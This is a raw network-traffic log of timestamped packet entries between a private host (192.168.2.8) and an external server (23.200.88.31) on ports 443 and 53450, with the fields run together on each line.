                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.155004025 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.155607939 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.155636072 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.155647993 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.155662060 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.156549931 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.156563997 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.161066055 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.161348104 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.161616087 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.161760092 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.161772966 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162050009 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162061930 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162079096 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162699938 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162713051 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162725925 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162738085 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.162749052 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.163331985 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.175873041 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.176002026 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.176225901 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.181457043 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.181801081 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182003021 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182081938 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182094097 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182553053 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182564974 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182576895 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.182590961 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.183263063 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.183280945 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.183294058 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.184433937 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.186858892 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.199461937 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.207849979 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.379271984 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.383997917 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.384257078 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.384527922 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.384706020 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.384718895 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385083914 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385096073 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385107994 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385678053 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385689020 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385699987 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385711908 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.385881901 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.397687912 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.397747993 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.397759914 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.397943020 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.397979021 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.397991896 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.398447990 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.398458958 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.398471117 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.398482084 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.398791075 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.418346882 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.466031075 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.466032028 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.469556093 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.493890047 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.501384974 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.506275892 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.506496906 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.506613970 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.506625891 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.506812096 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.506828070 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.514128923 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.522856951 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.527934074 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.528049946 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.528199911 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.528256893 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.528266907 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.528414965 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.534141064 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.724073887 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.733741999 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739439011 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739491940 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739787102 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739799976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739813089 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739823103 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.739893913 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.752235889 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.784369946 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.784384966 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.791003942 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.791035891 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.791328907 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.791342020 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.791353941 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.791532040 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.792115927 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797297955 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797502041 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797611952 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797625065 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797945976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797959089 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797971964 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797981024 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.797991037 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.799917936 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.800694942 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.801495075 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.801882029 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.801923037 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802138090 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802151918 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802330017 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802571058 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802583933 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802597046 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.802608967 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.803348064 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.803361893 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.803837061 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.812813044 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.815965891 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.816073895 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.816087008 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.816482067 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.828828096 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.829775095 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.835766077 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836307049 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836445093 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836556911 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836569071 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836832047 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836869001 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836880922 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.836893082 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.837528944 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.837543964 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.837554932 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.837701082 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.847815990 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.847887039 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.847899914 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.848262072 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.848299026 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.848310947 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.848855972 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.855210066 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.855494976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.855600119 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.855817080 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.855827093 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.856272936 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.856283903 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.856293917 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.856306076 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.857048035 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.857059956 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.866555929 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.866621971 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.870848894 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.871277094 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.916779995 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.924110889 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:31.924931049 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.067666054 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.074564934 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.074662924 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.074811935 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.074824095 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.075231075 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.075324059 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.075337887 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.075350046 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.076056004 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.076073885 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.076086044 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.076817989 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.078782082 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.086190939 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.117551088 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.117857933 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.125332117 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.125520945 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.125719070 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.125813961 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.125972986 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.125983953 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.127914906 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.133336067 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.134999990 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.135026932 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.135323048 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.135354042 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.135365963 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.135376930 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.144614935 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.147743940 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.151823997 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152129889 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152179956 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152332067 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152345896 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152755976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152795076 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.152807951 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.153877974 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.153894901 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.153932095 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.155251026 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.155412912 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.163481951 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.163546085 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.165829897 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.213176966 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.238818884 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.244240999 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.244402885 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.244498968 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.244641066 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.244899988 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245052099 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245064974 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245454073 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245466948 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245479107 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245488882 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245501041 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.245812893 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.248279095 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.248527050 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.248651028 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.248662949 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.249053001 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.249063969 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.249075890 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.249085903 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.249806881 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.260205984 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.384821892 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.417745113 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.447930098 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.455215931 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.455251932 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.455471992 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.455482960 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.455559015 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.462308884 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.470177889 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.470459938 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.470609903 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.470624924 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.470988035 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.471236944 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.471249104 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.471261024 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.471271992 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.471543074 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:32.471992970 CET4435345023.200.88.31192.168.2.8
